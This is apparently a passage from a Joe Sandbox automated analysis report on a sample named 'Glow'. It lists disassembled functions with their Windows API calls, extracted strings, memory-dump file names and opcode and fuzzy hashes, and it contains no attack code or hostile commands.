Opcode ID: d77310f8b5e5c1e22fb3cbcfc6ef9bd60a74844d9e6200915c4eeeffcc8c4831
Instruction ID: d9494599caf5821bfe92508fe19751de1d6b1ce2408576d96512c4f0bd684994
Opcode Fuzzy Hash: d77310f8b5e5c1e22fb3cbcfc6ef9bd60a74844d9e6200915c4eeeffcc8c4831
Instruction Fuzzy Hash: 0C617EB25043099FCB15EF60C8449AEB3E8FF89310F04496EFA99CB251DB35E945CB92

Function 004146E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00414715
SetMenu.USER32(?,00000000), ref: 00414724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004147AC
IsMenu.USER32(?), ref: 004147C0
CreatePopupMenu.USER32 ref: 004147CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004147F7
DrawMenuBar.USER32 ref: 004147FF

Strings

0, xrefs: 004146F0
F, xrefs: 004147EA

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: fe6a621273cd880c7fcb4000a0695a0993064d09ec02347c4df92b31577e24b6
Instruction ID: 3addf3efc82928de2baa7a36b6edde7cc526005654bd83a0e5f79c219229ab63
Opcode Fuzzy Hash: fe6a621273cd880c7fcb4000a0695a0993064d09ec02347c4df92b31577e24b6
Instruction Fuzzy Hash: DC417CB9A01205EFDB14DF64D844EEA7BB6FF49314F144029FA4597390C774A910CB68

Function 003E282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

Part of subcall function 003E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 003E4620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 003E28B1
GetDlgCtrlID.USER32 ref: 003E28BC
GetParent.USER32 ref: 003E28D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 003E28DB
GetDlgCtrlID.USER32(?), ref: 003E28E4
GetParent.USER32(?), ref: 003E28F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 003E28FB

Strings

ComboBox, xrefs: 003E2839
ListBox, xrefs: 003E286E

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 68febf1e06b491fa8c923ceb28a1f9ed2a96820ce6bfe331777e9da74e726e78
Instruction ID: bb88acd9419f18fe97d65d7b9a254c3f3f6ae27ebefff3a1f6b4b8b183f154ff
Opcode Fuzzy Hash: 68febf1e06b491fa8c923ceb28a1f9ed2a96820ce6bfe331777e9da74e726e78
Instruction Fuzzy Hash: CD21AAB5D00228BBCF02AF61CC85EEEBBB8EF06350F104266B951A71D1DB795419DB64

Function 003E290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

Part of subcall function 003E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 003E4620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 003E2990
GetDlgCtrlID.USER32 ref: 003E299B
GetParent.USER32 ref: 003E29B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 003E29BA
GetDlgCtrlID.USER32(?), ref: 003E29C3
GetParent.USER32(?), ref: 003E29D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 003E29DA

Strings

ComboBox, xrefs: 003E291A
ListBox, xrefs: 003E294F

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: cbc939fb7a77f442f47639057107c8c50b0a43a16c5f182762b1865193bfab1b
Instruction ID: c3218ca8ab1434eafc21b11ed0381808be0b87b7cc7c6f718916fbfc00878532
Opcode Fuzzy Hash: cbc939fb7a77f442f47639057107c8c50b0a43a16c5f182762b1865193bfab1b
Instruction Fuzzy Hash: B121C6B5D00264BBCF02AFA1CC85EEFBBB8EF05340F104166B951A71D6CB795819DB64

Function 004144BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00414539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0041453C
GetWindowLongW.USER32(?,000000F0), ref: 00414563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00414586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004145FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00414648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00414663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0041467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00414692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 004146AF

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 7323047925e6144a3a406dba8e862b8614b54d922dc9d9f7beacc0ee7d6114e1
Instruction ID: be4a38114679b2b96c52289ab8794361c149ad6fe5670b6a88b7d0cf6c09d612
Opcode Fuzzy Hash: 7323047925e6144a3a406dba8e862b8614b54d922dc9d9f7beacc0ee7d6114e1
Instruction Fuzzy Hash: 08618EB5A00208AFDB10DFA4CD81EEE77B8EF49314F10415AFA14E73A1C778A985DB54

Function 003EBAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 003EBB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,003EABA8,?,00000001), ref: 003EBB2C
GetWindowThreadProcessId.USER32(00000000), ref: 003EBB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003EABA8,?,00000001), ref: 003EBB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 003EBB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003EABA8,?,00000001), ref: 003EBB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003EABA8,?,00000001), ref: 003EBB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003EABA8,?,00000001), ref: 003EBBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003EABA8,?,00000001), ref: 003EBBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003EABA8,?,00000001), ref: 003EBBE4

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 1091065fae3962e2f5e56bae98935a24daf4c80b76501ff7b02c539668007687
Instruction ID: fd60fb7750a4d8ea8a61725ce961e64dec77f27c353bb6b9df76bf08e869b0a3
Opcode Fuzzy Hash: 1091065fae3962e2f5e56bae98935a24daf4c80b76501ff7b02c539668007687
Instruction Fuzzy Hash: 3931C3B1908319BFDB129B55DC84FAFB7ADEB44716F218125FA05CB1E4C774D8808B28

Function 00382AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00382AF9
OleUninitialize.OLE32(?,00000000), ref: 00382B98
UnregisterHotKey.USER32(?), ref: 00382D7D
DestroyWindow.USER32(?), ref: 003C3A1B
FreeLibrary.KERNEL32(?), ref: 003C3A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 003C3AAD

Strings

close all, xrefs: 00382AF4

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: a928c2c60a28196044f96d8ad1746984d51d630927bb8b2a3c6f08ed4abe3fd0
Instruction ID: ebd60ece1c35f1f514dc63d4a7971765a3047caaae31788b097decb04ba1627d
Opcode Fuzzy Hash: a928c2c60a28196044f96d8ad1746984d51d630927bb8b2a3c6f08ed4abe3fd0
Instruction Fuzzy Hash: ADD13C757012129FCB1AEF14C985F6AF7A4EF04710F1182EDE94AAB261CB31AD62CF44

Function 003F8835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003F89F2
SetCurrentDirectoryW.KERNEL32(?), ref: 003F8A06
GetFileAttributesW.KERNEL32(?), ref: 003F8A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 003F8A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 003F8A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 003F8AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003F8AF5

Strings

*.*, xrefs: 003F8AAB

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: b5d73d5397072b21afbf5c8cdbcd2c0b5a10ea29ff797855300bc72733d1bb2c
Instruction ID: da94041d452c2f1816d3749855517a91b442ef9e44123dafb902eaa5d9634e60
Opcode Fuzzy Hash: b5d73d5397072b21afbf5c8cdbcd2c0b5a10ea29ff797855300bc72733d1bb2c
Instruction Fuzzy Hash: F481AF719043099BCB2AEF14C844ABBB3E8FF85310F55482EFA95DB250DF74D9458B92

Function 004188F9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00418992
IsWindowEnabled.USER32(00000000), ref: 0041899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00418A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00418AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 00418AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 00418B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00418B1E

Strings

(E, xrefs: 004189D5

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID: (E
API String ID: 4072528602-3218771753
Opcode ID: b0d930f690457f233f792e5edbf30a6b75babd5c0bef1f6ab0338da81fc77ad8
Instruction ID: ea564ade61fa479ce725d0ae07022f6e477167430a9d3da02ec19ec18e222eca
Opcode Fuzzy Hash: b0d930f690457f233f792e5edbf30a6b75babd5c0bef1f6ab0338da81fc77ad8
Instruction Fuzzy Hash: 21719BB4604204AFEB219F54C884FFBBBB9EF09340F14445FE945A7361CB39A981CB59

Function 00387447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 003874D7

Part of subcall function 00387567: GetClientRect.USER32(?,?), ref: 0038758D
Part of subcall function 00387567: GetWindowRect.USER32(?,?), ref: 003875CE
Part of subcall function 00387567: ScreenToClient.USER32(?,?), ref: 003875F6

GetDC.USER32 ref: 003C6083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003C6096
SelectObject.GDI32(00000000,00000000), ref: 003C60A4
SelectObject.GDI32(00000000,00000000), ref: 003C60B9
ReleaseDC.USER32(?,00000000), ref: 003C60C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003C6152

Strings

U, xrefs: 003C6021

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: d0d96564164479fd512c00a00bf582e71851e4558cde7f29a751ba60a2d10c19
Instruction ID: 8cb0867bd6d4c3a3b242a8c405e316c14b7a0606a4590e87acaefca24ff68a05
Opcode Fuzzy Hash: d0d96564164479fd512c00a00bf582e71851e4558cde7f29a751ba60a2d10c19
Instruction Fuzzy Hash: FE71AE31504205DFCF229F64CC86EAA7BB6FF49321F2942AEE9559A2A6C731CC40DB50

Function 003FCC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003FCCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003FCCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003FCD0F
GetLastError.KERNEL32 ref: 003FCD67
SetEvent.KERNEL32(?), ref: 003FCD7B
InternetCloseHandle.WININET(00000000), ref: 003FCD86

Strings

, xrefs: 003FCD00

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 87e03e2b26928fa62aed8761b34688ebcffa184944e95e1d976fb5b28c2ecbb6
Instruction ID: ddd5f7302018af3665fd69a10d06cccd16dd38db2a7cba58878a4d96383cb7d2
Opcode Fuzzy Hash: 87e03e2b26928fa62aed8761b34688ebcffa184944e95e1d976fb5b28c2ecbb6
Instruction Fuzzy Hash: D331BCB195020CAFD722AF608E88ABF7BFCEB45740B00452AF64697250DB34ED049B64

Function 003EA215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003C55AE,?,?,Bad directive syntax error,0041DCD0,00000000,00000010,?,?), ref: 003EA236
LoadStringW.USER32(00000000,?,003C55AE,?), ref: 003EA23D

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003EA301

Strings

Error: , xrefs: 003EA2CF
Line %d (File "%s"):, xrefs: 003EA2A7
., xrefs: 003EA2E7
Line %d:, xrefs: 003EA28C
%s (%d) : ==> %s.: %s %s, xrefs: 003EA26B

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: b6bf47f39a0942b122ce1108b7d3ea761108df7229a86197f3798f7bcada12c2
Instruction ID: d92678f344f4d2132d729f455dd5e6d6fde0045f66485892357198ec1884c9e7
Opcode Fuzzy Hash: b6bf47f39a0942b122ce1108b7d3ea761108df7229a86197f3798f7bcada12c2
Instruction Fuzzy Hash: 95216F3180031AAFCF03BFA0CC06FEE7B79BF18304F044866B515691A2EB75AA18DB51

Function 003E29EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 003E29F8
GetClassNameW.USER32(00000000,?,00000100), ref: 003E2A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003E2A9A

Strings

details, xrefs: 003E2A48
SHELLDLL_DefView, xrefs: 003E2A19
largeicons, xrefs: 003E2A2E
list, xrefs: 003E2A7C
smallicons, xrefs: 003E2A62

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 60af23be7165d804f8356394cdb89b09e4397cb382d5da3367f2a3c89a222723
Instruction ID: c0296fc89b7f63d02a672d6db266ddfe438e67f5219b53f09367747ec4424df8
Opcode Fuzzy Hash: 60af23be7165d804f8356394cdb89b09e4397cb382d5da3367f2a3c89a222723
Instruction Fuzzy Hash: AD1129B66843A7B9F6276222EC07DA7379CCF16724B320236F904F44D2FFA5A8004519

Function 00387567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0038758D
GetWindowRect.USER32(?,?), ref: 003875CE
ScreenToClient.USER32(?,?), ref: 003875F6
GetClientRect.USER32(?,?), ref: 0038773A
GetWindowRect.USER32(?,?), ref: 0038775B

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 6eac49a99ade90f36e545cba0f7bd4eaffa70491555bb5ea7f7130ed112562a3
Instruction ID: 1c04de50f9e185e39bf4a1f40d406be6324cf742a362347a5c7ab61464622066
Opcode Fuzzy Hash: 6eac49a99ade90f36e545cba0f7bd4eaffa70491555bb5ea7f7130ed112562a3
Instruction Fuzzy Hash: 7CC1477990464AEBDB11DFA8C980BEDBBF5FF08310F24845AE899E3250D734E951DB60

Function 003BD210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 003BD237
_free.LIBCMT ref: 003BD2A2
_free.LIBCMT ref: 003BD2C8
_free.LIBCMT ref: 003BD2F1
_free.LIBCMT ref: 003BD329
_free.LIBCMT ref: 003BD35A
_free.LIBCMT ref: 003BD39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 003BD41C
_free.LIBCMT ref: 003BD435

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: ee6cf80be1b64c4640d86c91320a6c7631a041d770e993620062dc3951044db2
Instruction ID: 77ea7a88b55fad3975e7305850755ae37fd7e9df03f774f5e6ed967f4bd29c5b
Opcode Fuzzy Hash: ee6cf80be1b64c4640d86c91320a6c7631a041d770e993620062dc3951044db2
Instruction Fuzzy Hash: 3F611671A04340AFDB23AF74D881BEA7BA49F01328F050A7DEB459FA92FA31D9008755

Function 00415B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00415C24
ShowWindow.USER32(?,00000000), ref: 00415C65
ShowWindow.USER32(?,00000005,?,00000000), ref: 00415C6B
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00415C6F

Part of subcall function 004179F2: DeleteObject.GDI32(00000000), ref: 00417A1E

GetWindowLongW.USER32(?,000000F0), ref: 00415CAB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00415CB8
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00415CEB
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00415D25
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00415D34

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 5d88dbdeec6428cfdff44ea5219853e7f7b600d2c7d23e3865d68e9e8135799f
Instruction ID: cb2935d2e5e7d597878a7ce6df8b2c80c14cc247ddcc0a3fadc1f995d70d4155
Opcode Fuzzy Hash: 5d88dbdeec6428cfdff44ea5219853e7f7b600d2c7d23e3865d68e9e8135799f
Instruction Fuzzy Hash: 7A51DE30A40B18FFEF219F24CC49BDA3B65AB80354F108117F6249A2E1D779A9C0DB89

Function 003FCB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003FCBC7
GetLastError.KERNEL32 ref: 003FCBDA
